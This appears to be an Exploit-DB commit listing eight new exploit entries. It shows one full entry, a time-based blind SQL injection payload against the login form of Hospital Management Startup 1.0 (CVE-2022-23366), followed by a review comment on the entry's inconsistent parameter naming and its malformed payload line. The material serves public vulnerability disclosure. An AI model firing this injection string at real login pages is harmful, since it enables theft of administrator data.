
8 changes to exploits/shellcodes

Cain & Abel 4.9.56 - Unquoted Service Path
Hospital Management Startup 1.0 - 'Multiple' SQLi
Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)
Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection
WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)
WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)
34 lines
No EOL
1,020 B
Text
# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi
# Exploit Author: nu11secur1ty
# Date: 02.10.2022
# Vendor: https://github.com/kabirkhyrul
# Software: https://github.com/kabirkhyrul/HMS
# CVE-2022-23366

# Description:
The loginid and password parameters from Hospital Management Startup
1.0 appear to be vulnerable to SQL injection attacks.
The attacker can retrieve all information from the administrator
account of the system and he can use the information for malicious
purposes!
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!

Status: CRITICAL


[+] Payloads:

```mysql
---
Parameter: loginid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND
(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND
'sDHP'='sDHP&rememberme=on&submit=Login
---

```
# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366
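Review bot: the entry does not agree with itself on which parameter is affected, and the recorded Payload line cannot settle it. The file title and the `Parameter: loginid (POST)` line name only `loginid`, the Description names both `loginid` and `password`, and the commit list calls the issue 'Multiple', while the Payload line runs `loginid=hackedpassword=hacked'` together with no separator, so the injected quote sits after the `password=` value rather than in `loginid`. The header, Description and Parameter line should name the same parameter set so that anyone triaging CVE-2022-23366 knows which inputs to test and fix. Separately, the Reproduce link is a GitHub editor URL (`/edit/main/...`) rather than a link to the files themselves, and the entry gives no affected file, fixed version or remediation, which a reader of a finding marked `Status: CRITICAL` would expect.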